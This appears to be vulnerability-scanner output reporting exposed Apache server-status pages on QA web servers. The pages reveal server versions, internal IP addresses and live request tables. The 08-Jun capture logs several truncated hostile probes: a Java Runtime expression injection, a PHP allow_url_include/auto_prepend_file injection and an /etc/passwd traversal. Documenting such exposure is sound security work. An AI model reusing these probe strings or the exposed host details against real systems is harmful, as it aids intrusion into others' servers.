/etc/designs/diagnostics/vendor/ofi.min.js HTTP/1.1 24-0115824/22/3418K 0.040113728286.40.3247.98 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /about HTTP/1.1 25-0115830/28/2784_ 0.07275134024700.010.5553.36 10.253.106.168http/1.1 26-0115840/14/2882R 0.0427503564300.00.0435.29 10.253.106.168http/1.1 27-0313610/0/3104R 0.0042104519120.00.0033.24 10.253.106.168http/1.1 28-0289785/5/2956K 0.01491129984215.80.0273.02 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /content/dam/diagnostics/allergen-fact-sheet-pdf/spanish/Mo 29-0180860/176/3666R 0.59317443500430.01.5764.59 10.253.106.168http/1.1 30-075080/13/3109_ 0.03118132605780.00.0534.62 10.253.106.168http/1.1 31-0150050/10/2672_ 0.03258113841840.00.0536.66 10.253.106.191http/1.1 32-0160180/4/3311_ 0.01118154371890.00.0352.59 10.253.106.168http/1.1www.qa.thermofisher.com:80POST /diagnostic-education/api/aem-datahub/api/e_catalog/get_pr 33-0105523/29/3490K 0.05174643536.70.3966.06 10.253.106.168http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 34-0179522705/22705/22705K 22.34402170441600.040.6340.63 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 35-0-0/0/3536. 0.0092203155250.00.0033.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0117550/523/4300_ 1.63118124732660.02.8838.25 10.253.106.168http/1.1 37-0289790/8/3889R 0.014032564674920.00.1295.06 10.253.106.191http/1.1 38-0289801/2/3101K 0.00110342794332.10.0140.37 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 39-079520/50/3438_ 0.1670113445030.01.3842.62 10.253.106.191http/1.1 40-0122480/23/3244_ 0.0724255035690.00.1659.98 10.253.106.168http/1.1 41-0122520/15/2393R 0.053176132679000.00.2431.59 10.253.106.191http/1.1 42-0290400/5/3157R 0.01380126493980.00.2932.80 10.253.106.191http/1.1 43-0301330/9/3625R 0.02547105362860.00.0376.02 10.253.106.191http/1.1 44-079550/23/3309_ 0.1251123874600.00.2739.04 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 45-0306640/1/2444R 0.00501134071870.00.0054.57 10.253.106.168http/1.1 46-0290410/0/2547R 0.0041502773370.00.0030.79 10.253.106.191http/1.1 47-0160190/3/2861_ 0.00119133940320.00.0138.76 10.253.106.168http/1.1 48-0-0/0/2771. 0.0092102861880.00.0032.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-0105540/39/2391_ 0.11257121954060.00.2148.11 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 50-0160230/1/2368_ 0.00132112395650.00.0071.70 10.253.106.191http/1.1 51-0290420/0/1821R 0.0040401648470.00.0025.22 10.253.106.168http/1.1 52-0105560/22/2471R 0.05298132378830.00.2232.69 10.253.106.168http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cce27a49d
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 11-Jun-2024 21:05:42 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 35 days 7 hours 5 minutes 52 seconds Server load: 0.00 0.02 0.00 Total accesses: 4762189 - Total Traffic: 32.7 GB - Total Duration: 326310997 CPU Usage: u70.73 s260.26 cu5744.17 cs5705.96 - .386% CPU load 1.56 requests/sec - 11.3 kB/second - 7.2 kB/request - 68.5212 ms/request 37 requests currently being processed, 39 idle workers _RK_KKR__R_RW_K__K____.K_..K____K.RKKK_K__KK..KR_.__..KK.KK_.R__ ___RK___R__._.K...K..........K....K...K.._....._R_.._........... ....R........................................................... ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0267640/204/50490_ 0.461691239282830.00.59293.67 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0305940/443/51147R 1.293871234882850.04.11340.32 10.253.106.191http/1.1 2-02748323/461/133362K 1.321213339109755.23.18464.63 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-0267650/102/50145_ 0.251241144533290.00.28401.62 10.253.106.191http/1.1 4-02349646347/46709/88181K 43.2370364071385505.785.32428.94 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-02676645/235/59728K 0.651010377996297.68.10762.15 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 6-0316890/816/48195R 2.053781337804680.03.74602.58 10.253.106.191http/1.1 7-0267670/210/49272_ 0.534641104800.02.91376.61 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/content/user_system_ 8-015230/575/51951_ 1.48911341190650.04.88447.32 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0267680/151/55324R 0.3540315037232800.00.36334.37 10.253.106.168http/1.1 10-05910/32/50245_ 0.08166108240183160.00.26597.09 10.253.106.191http/1.1 11-015330/339/60748R 0.8840314531212250.01.15325.58 10.253.106.168http/1.1 12-02707812/113/49630W 0.2700404166120.60.42440.43 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 13-0318270/1209/50487_ 3.021521133965940.019.26327.00 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-065025/233/52785K 1.05105242920082561.14.40514.43 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /allergy/jp/ja/living-with-allergies/symptom-management/cel 15-040280/0/60115_ 0.0098037368680.00.00430.64 10.253.106.168http/1.1 16-0275250/170/98119_ 0.38981240721810.00.50383.84 10.253.106.168http/1.1 17-02238926/163/49554K 0.79991136157273610.75.23356.53 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-0267700/258/43833_ 0.57901331081000.02.12359.93 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-040290/0/49469_ 0.0098037479180.00.00487.56 10.253.106.168http/1.1 20-040300/1/46472_ 0.00981238908750.00.00392.65 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-0305990/553/52002_ 1.4641343323670.02.80330.11 10.253.106.168http/1.1 22-0-0/0/48574. 0.003405035756660.00.00417.99 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-082276/444/47045K 1.45109603651346302.139.44410.75 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base.min.js HT 24-06510/126/47715_ 0.39232102834193470.00.61352.21 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0-0/0/48833. 0.003410038810270.00.00368.42 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-0-0/0/49517. 0.003412037364140.00.00404.86 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 27-069624/134/84938K 0.385153924239443.80.92379.34 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-0306020/804/49639_ 1.94991130651440.04.39315.20 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-082300/376/46068_ 0.9147239635110.01.50434.58 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/clientlib-all.min.css HTTP/1.1 30-082310/435/50239_ 1.03981044088110.02.97383.16 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-082320/206/46407_ 0.49981229440110.01.32396.77 10.253.106.168http/1.1 32-0823331/411/47287K 1.0918611333463268.21.57323.63 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-0-0/0/212387. 0.003110014415030.00.00456.66 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0113110/599/46602R 1.343841337145760.03.20264.34 10.253.106.191http/1.1 35-0306046/341/47622K 0.959311474988913.12.40314.75 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-06973/144/43991K 0.3711238789026.60.47282.48 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-082352/244/126235K 0.721681023713484.38.79342.53 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 38-06980/91/42788_ 0.4423278332772660.00.78353.43 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-0823631/344/43172K 0.7922511330024387.21.05316.38 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-0257360/208/44313_ 0.4423215232010430.00.87350.27 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0257370/176/45200_ 0.37841134783440.02.53315.52 10.253.106.168http/1.1 42-02846724/749/44812K 1.892390361117051.44.81404.36 10.253.106.191http/1.1qa1-designsystem.thermofisher.cGET /?1718151526 HTTP/1.1 43-0257381/169/41557K 0.40991030567022.234.46350.97 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-0-0/0/42744. 0.003718029172270.00.00374.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0-0/0/44064. 0.003644038370750.00.00427.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-02573947/306/42081K 0.7410803137255988.54.06322.03 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /allergy/jp/ja/living-with-allergies/symptom-management/cel 47-0257400/198/44755R 0.454031003034
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c26eb2fde
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 10-Jun-2024 14:19:21 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 34 days 19 minutes 32 seconds Server load: 0.00 0.02 0.01 Total accesses: 4610853 - Total Traffic: 31.5 GB - Total Duration: 313272592 CPU Usage: u58.59 s232.82 cu5553.09 cs5533.96 - .387% CPU load 1.57 requests/sec - 11.2 kB/second - 7.2 kB/request - 67.9424 ms/request 38 requests currently being processed, 37 idle workers K_K_K__K_K_._.R__K._._K_K_WK.__K___KR_R_K__K_K_RRK.K_.._K.K_RRKK KK__.._......_KKR.._K.__R._K....KK_.._.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-01299518/225/48964K 0.52361286379450240.014.25282.54 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0123790/137/49646_ 0.302481032417880.00.31328.54 10.253.106.168http/1.1 2-02302418/580/131957K 1.673413304875142.32.90434.86 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-0132260/470/48869_ 1.0921213643595680.01.75373.82 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 4-02349635269/35631/77103K 32.4670363019965069.765.37408.98 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-072050/95/58304_ 0.34526336452300.00.57739.62 10.253.106.191http/1.1 6-066890/378/46469_ 0.91641036827150.01.22594.47 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-01271833/75/47476K 0.1622313397798572.90.16350.66 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 8-0293060/39/50319_ 0.082681140276350.00.09431.03 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0985956/412/53856K 1.1092113631685131.21.69326.93 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 10-0185400/113/48470_ 0.673071337793120.01.60580.25 10.253.106.168http/1.1 11-0-0/0/58980. 0.00505030300630.00.00307.51 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 12-0309830/13/47807_ 0.0333283036292680.00.03428.91 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-0-0/0/48593. 0.002676033010780.00.00303.99 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-092270/228/51111R 0.465171141948480.00.50495.26 10.253.106.168http/1.1 15-092280/142/58524_ 0.291396634433310.00.33405.42 10.253.106.168http/1.1 16-067030/209/96799_ 0.472141238304390.00.49374.34 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-01847917/361/47989K 1.061511347489337.33.05336.02 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-0-0/0/42111. 0.002343030174850.00.00349.10 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0142260/333/48391_ 0.842081035357210.01.29480.68 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 20-0-0/0/45544. 0.002341035866540.00.00388.39 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0212460/261/50325_ 0.571591240873540.00.64315.80 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 22-0233637/218/47407K 0.526712331937215.60.74391.68 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 23-0212470/300/45170_ 0.871481035422170.02.07358.37 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-01240988/198/46286K 0.71271113328554197.31.13342.56 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-092300/439/46983_ 0.971821037730210.01.30350.00 10.253.106.168http/1.1 26-02124828/168/48120W 0.4200365897061.30.54394.02 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 27-01370680/471/83856K 1.66160103859840183.014.89371.83 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-0-0/0/47879. 0.002340029653650.00.00302.92 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 29-072390/266/44840_ 0.581481237104560.01.31429.56 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-059250/278/48350_ 0.63514441658130.00.84371.89 10.253.106.191http/1.1 31-01272133/81/45363K 0.159211286197675.50.18388.08 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-092310/137/45366_ 0.29821032371820.00.30308.02 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-0137070/552/210984_ 1.47207113616750.02.56447.54 10.253.106.168http/1.1 34-092320/209/45008_ 0.46571036206870.00.89254.59 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 35-0986238/435/46256K 1.3836818456868884.23.81275.84 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-0127220/193/42424R 0.413571236323210.00.42271.27 10.253.106.191http/1.1 37-072410/388/124808_ 0.851571021457110.00.86325.75 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 38-0127230/54/41651R 0.094531231828440.00.09325.33 10.253.106.168http/1.1 39-0235950/653/42046_ 1.613296132446950.02.25310.79 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-01615182/372/42954K 1.16276123133906188.74.68342.94 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0161520/323/44276_ 1.2832109933827950.02.56308.30 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-072420/185/42875_ 0.411711134796760.00.49387.27 10.253.106.191http/1.1 43-02308847/510/40447K 1.10156333002716103.11.26311.92 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-0230890/285/41091_ 0.77271128040170.01.05363.92 10.253.106.191http/1.1 45-02309037/169/42629K 0.3636547371806083.70.58419.93 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 46-072430/177/40637_ 0.57267930691810.00.97313.85 10.253.106.191http/1.1 47-02336
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c9ce0ca9b
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 08-Jun-2024 11:59:06 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 31 days 21 hours 59 minutes 16 seconds Server load: 0.26 0.10 0.08 Total accesses: 4329264 - Total Traffic: 29.6 GB - Total Duration: 294828765 CPU Usage: u56.95 s230.7 cu5224.16 cs5167.35 - .387% CPU load 1.57 requests/sec - 11.3 kB/second - 7.2 kB/request - 68.1014 ms/request 42 requests currently being processed, 38 idle workers .__KK__R__R__R____KRR_KKK__.R__K_KK_K.R__KK._R__..__.._K.._....K _K._._..KR...RKRK..__K...K..K._K.RR__W_KRKKKK_.................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0-0/0/45307. 0.00167134752400.00.00254.61 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 1-0237640/688/46659_ 1.56164030713420.01.94313.61 10.253.106.191http/1.1qa1-designsystem.thermofisher.cGET / HTTP/1.1 2-0216680/0/128760_ 0.00174029006320.00.00420.94 10.253.106.191http/1.1 3-0272764/464/45137K 1.08171140043078.71.29355.99 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 4-02349617148/17510/58982K 16.9711361546231640.932.72376.34 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 5-0123060/13721/55186_ 18.431741134436950.027.38687.54 10.253.106.191http/1.1 6-0135520/1380/43121_ 3.206411935385020.04.08561.18 10.253.106.168http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/common.min.2024.4.19.144. 7-0237660/393/44497R 0.861951137760250.01.78336.38 10.253.106.191http/1.1 8-0326130/325/47596_ 0.70164837285400.00.88402.56 10.253.106.191http/1.1qa1-designsystem.thermofisher.cGET /strategy/validate-expression?expression=T%28java.lang.Runt 9-051600/133/51175_ 0.321699032896310.00.42314.64 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 10-021940/611/45471R 1.553711233086680.02.06564.05 10.253.106.191http/1.1 11-0238980/400/56641_ 1.25164329072380.02.52292.87 10.253.106.191http/1.1qa1-designsystem.thermofisher.cPOST /login.php?%add+allow_url_include%3d1+%add+auto_prepend_fi 12-0238990/133/45021_ 0.461841333417740.00.76414.81 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-056280/283/46630R 0.674771532001200.00.74291.99 10.253.106.191http/1.1 14-0267330/844/48372_ 1.91141540484920.05.93481.19 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-081880/920/56205_ 2.121744933398190.02.89388.24 10.253.106.191http/1.1 16-0216710/0/94158_ 0.00174032931550.00.00358.11 10.253.106.191http/1.1 17-0216720/0/45548_ 0.00174033487190.00.00325.78 10.253.106.191http/1.1 18-02058051/55/39881K 0.11255122866812128.90.14338.73 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-0216730/4/45353R 0.014761033863550.00.01463.73 10.253.106.191http/1.1 20-0319080/668/42977R 1.702821234574660.02.78374.39 10.253.106.168http/1.1 21-0216740/1/46811_ 0.00164937970080.00.00298.36 10.253.106.191http/1.1qa1-designsystem.thermofisher.cGET /router/route/1/http/qa1-designsystem.thermofisher.com.CVE- 22-0187918/1652/44286K 4.2518911302168017.75.81375.66 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 23-02192823/23/42321K 0.052601145336765950.00.05342.65 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-0326191/186/43608K 0.43204532085852.20.45330.00 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0272770/307/43471_ 0.731634936121190.01.18328.38 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-0216750/45/45072_ 0.10631133206680.00.21376.31 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0-0/0/81435. 0.00171033946620.00.00327.59 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 28-054400/24/45364R 0.06191027860350.00.06287.84 10.253.106.168http/1.1 29-0272780/266/41700_ 0.591611234917020.00.69403.40 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.css?v= HTT 30-0126680/1896/44961_ 4.74171439400880.05.80352.99 10.253.106.168http/1.1 31-02390210/479/42435K 1.20010270447022.13.90362.84 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-0317230/293/42821_ 0.63631130537990.02.41289.07 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-02192915/15/207543K 0.02761197502733.00.03428.75 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 34-039492/584/41790K 1.33151434446204.41.99229.85 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 35-0308790/1624/43263_ 4.32121242600450.09.27253.62 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-021930142/142/40426K 0.30817933516107312.10.30261.77 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-0-0/0/122015. 0.00172018446900.00.00311.93 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-0219330/0/38679R 0.00476030447990.00.00304.98 10.253.106.191http/1.1 39-0261390/409/39106_ 1.041741029458180.01.25298.14 10.253.106.191http/1.1qa1-designsystem.thermofisher.cGET /images../etc/passwd HTTP/1.1 40-0126750/1785/41022_ 4.35621629781200.05.55326.30 10.253.106.168http/1.1 41-02193436/36/41409K 0.0614161831687572951.32.88289.41 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0326211/289/39836K 0.652083533239122.20.74369.48 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-0-0/0/38263. 0.00173027529060.00.00298.97 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0326220/90/38780_ 0.32622126953680.00.62347.10 10.253.106.168http/1.1 45-056300/241/40442R 0.58367834250650.00.61407.19 10.253.106.191http/1.1 46-062720/759/38756_ 1.94177428228760.03.61304.60 10.253.106.168http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.css?v= HT 47-062730/1374/40745_ 3.06781428147860.07.09282.44 10.253.106.191http/1.1qa1.thermofisher.in:80GET /etc/design
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cd7729788
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 06-Jun-2024 05:58:53 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 29 days 15 hours 59 minutes 4 seconds Server load: 0.14 0.05 0.01 Total accesses: 3763333 - Total Traffic: 26.9 GB - Total Duration: 264819760 CPU Usage: u83.78 s282.33 cu4617.44 cs4349.25 - .364% CPU load 1.47 requests/sec - 11.0 kB/second - 7.5 kB/request - 70.3684 ms/request 47 requests currently being processed, 38 idle workers __R________R_RK__KKR_RRRK_R_K__RR__RKWR__K.R_RR_R_K_K_KKR..._K_K K_K...KK..R.._......._.RK_RK.K.__KR_KKK__R...................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0254500/67/39831_ 0.1412455531459670.01.18228.39 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0319750/1508/39799_ 3.611681227466170.05.24282.44 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-0236670/79/122262R 0.19232825652020.00.31374.88 10.253.106.164http/1.1 3-0244610/134/38221_ 0.4089636637880.00.70325.63 10.253.106.164http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/desktoplibs.min.css?v= HT 4-09620/694/41365_ 1.64197934409230.02.11343.25 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /api/v1/database/7 HTTP/1.1 5-0298960/6/41247_ 